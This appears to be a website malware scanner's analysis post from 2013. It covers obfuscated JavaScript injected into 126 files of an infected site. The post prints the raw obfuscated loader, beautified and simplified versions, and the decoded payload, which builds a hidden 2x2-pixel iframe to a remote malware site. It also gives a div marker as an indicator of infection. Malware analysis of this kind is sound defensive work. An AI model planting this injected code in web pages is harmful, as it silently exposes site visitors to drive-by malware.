JavaScript code injection generates hidden iframe to malicious website
Background
Online Website Malware Scanner has identified malicious JavaScript in the scanned website. Such obfuscated JavaScript code is used to build malicious iframes that are invisible to the website user, in order to load content from a remote malware distributor.
This infected website hosts malicious JavaScript code injected into 126 files. As discussed in other posts about malicious iframe generation, the attack flow is very similar and uses multiple levels of obfuscation to evade detection mechanisms.
This infected website hosts malicious JavaScript code injected in 126 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources (websites).
Website malware scanner report
Submission date: Wed Apr 10 05:21:44 2013
Infected website's files: 126
Detection of encoded suspicious JavaScript code in website's files:
Threat dump:
[[ if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array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}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e%26%26(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");}]]
Malware entry details
Beautified script
- if (021 === 0x11) v = "va" + "l";
- try {
- faweb++
- } catch (btawetb) {
- try {
- fve ^ v
- } catch (btawt4) {
- try {
- window.document.body = v
- } catch (gdsgsdg) {
- w = window;
- if (020 === 0x10) e = w["e".concat(v)];
- }
- }
- }
- if (1) {
- f = new Array(40, 101, 115, 110, 98, 114, 105, 110, 108, 40, 40, 11, 10, 122, 11, 10, 31, 116, 97, 113, 30,97, 31, 59, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 98, 112, 101, 96, 114, 101, 68, 106, 101, 108, 99, 110,115, 38, 39, 104, 100, 114, 96, 107, 101, 38, 39, 59, 12, 8, 13, 9, 30, 97, 45, 113, 114, 98, 30, 61, 31, 37, 104,115, 114, 112, 57, 45, 47, 102, 99, 116, 120, 109, 117, 113, 96, 101, 115, 44, 111, 113, 101, 39, 58, 11, 10, 31,95, 46, 114, 114, 121, 107, 99, 46, 111, 109, 115, 104, 114, 105, 110, 108, 32, 60, 30, 39, 96, 96, 115, 110, 106,117, 115, 99, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 97, 109, 114, 99, 99, 114, 31, 59, 32, 38,46, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 103, 99, 105, 102, 102, 116, 31, 59, 32, 38, 48, 112,119, 37, 59, 12, 8, 32, 96, 44, 115, 115, 119, 108, 100, 44, 119, 104, 98, 116, 103, 30, 61, 31, 37, 50, 111, 118,39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 107, 99, 102, 115, 30, 61, 31, 37, 49, 111, 118, 39, 58,11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 115, 109, 112, 31, 59, 32, 38, 47, 112, 119, 37, 59, 12, 8, 13, 9,30, 105, 101, 38, 33, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64,121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 39, 13, 9, 30, 123, 12, 8, 32, 99, 109, 99, 116, 107,101, 109, 114, 46, 118, 112, 105, 115, 99, 40, 38, 58, 100, 104, 116, 32, 104, 98, 61, 91, 37, 109, 96, 112, 119,96, 98, 115, 91, 37, 62, 59, 45, 100, 104, 116, 62, 38, 39, 59, 12, 8, 32, 99, 109, 99, 116, 107, 101, 109, 114,46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39,40, 44, 97, 111, 110, 101, 109, 98, 67, 103, 103, 108, 99, 38, 97, 40, 57, 13, 9, 30, 125, 12, 8, 125, 40, 38, 41,58, 11, 10);
- }
- w = f;
- s = [];
- r = String;
- for (i = 0; - i + 412 != 0; i += 1) {
- j = i;
- if (e % 26 % 26(031 == 0x19)) s = s + r["fromCh" + "arC" + ((020 === 0x10) ? "ode" : "")]((1 * w[j] + j % 3));
- }
- try {
- (w + s)()
- } catch (asga) {
- e(s + "");
- }
Simplified version of web threat
- f = new Array(40, 101, 115, 110, 98, 114, 105, 110, 108, 40, 40, 11, 10, 122, 11, 10, 31, 116, 97, 113, 30, 97,31, 59, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 98, 112, 101, 96, 114, 101, 68, 106, 101, 108, 99, 110, 115,38, 39, 104, 100, 114, 96, 107, 101, 38, 39, 59, 12, 8, 13, 9, 30, 97, 45, 113, 114, 98, 30, 61, 31, 37, 104, 115,114, 112, 57, 45, 47, 102, 99, 116, 120, 109, 117, 113, 96, 101, 115, 44, 111, 113, 101, 39, 58, 11, 10, 31, 95,46, 114, 114, 121, 107, 99, 46, 111, 109, 115, 104, 114, 105, 110, 108, 32, 60, 30, 39, 96, 96, 115, 110, 106,117, 115, 99, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 97, 109, 114, 99, 99, 114, 31, 59, 32, 38,46, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 103, 99, 105, 102, 102, 116, 31, 59, 32, 38, 48, 112,119, 37, 59, 12, 8, 32, 96, 44, 115, 115, 119, 108, 100, 44, 119, 104, 98, 116, 103, 30, 61, 31, 37, 50, 111, 118,39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 107, 99, 102, 115, 30, 61, 31, 37, 49, 111, 118, 39, 58,11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 115, 109, 112, 31, 59, 32, 38, 47, 112, 119, 37, 59, 12, 8, 13, 9,30, 105, 101, 38, 33, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64,121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 39, 13, 9, 30, 123, 12, 8, 32, 99, 109, 99, 116, 107,101, 109, 114, 46, 118, 112, 105, 115, 99, 40, 38, 58, 100, 104, 116, 32, 104, 98, 61, 91, 37, 109, 96, 112, 119,96, 98, 115, 91, 37, 62, 59, 45, 100, 104, 116, 62, 38, 39, 59, 12, 8, 32, 99, 109, 99, 116, 107, 101, 109, 114,46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39,40, 44, 97, 111, 110, 101, 109, 98, 67, 103, 103, 108, 99, 38, 97, 40, 57, 13, 9, 30, 125, 12, 8, 125, 40, 38, 41,58, 11, 10);
- s = ""
- for (i = 0; - i + 412 != 0; i += 1) {
- s = s + String.fromCharCode(1 * f[i] + i % 3);
- }
- eval(s);
Malicious payload
Decoded payload generates a hidden 2x2-pixel iframe to http://getyourbet[.]org. The check for an element with id 'marwads' acts as a marker so the iframe is injected only once per page; the presence of that div id in page source is a useful indicator when checking a site for this infection.
- (function()
- {
- var a = document.createElement('iframe');
- a.src = 'http://getyourbet.org';
- a.style.position = 'absolute';
- a.style.border = '0';
- a.style.height = '2px';
- a.style.width = '2px';
- a.style.left = '1px';
- a.style.top = '1px';
- if(!document.getElementById('marwads'))
- {
- document.write('<div id=\'marwads\'></div>');
- document.getElementById('marwads').appendChild(a);
- }
- })();
Blacklisting status
McAfee | SiteAdvisor: "McAfee TrustedSource web reputation analysis found potential security risks with this site. Use with extreme caution." (McAfee SiteAdvisor analysis)
Malware clean-up
Such malware is often hidden inside JavaScript files. If you suspect that your website has been infected by similar malware, please use Website Anti-malware Monitoring for a remediation assessment.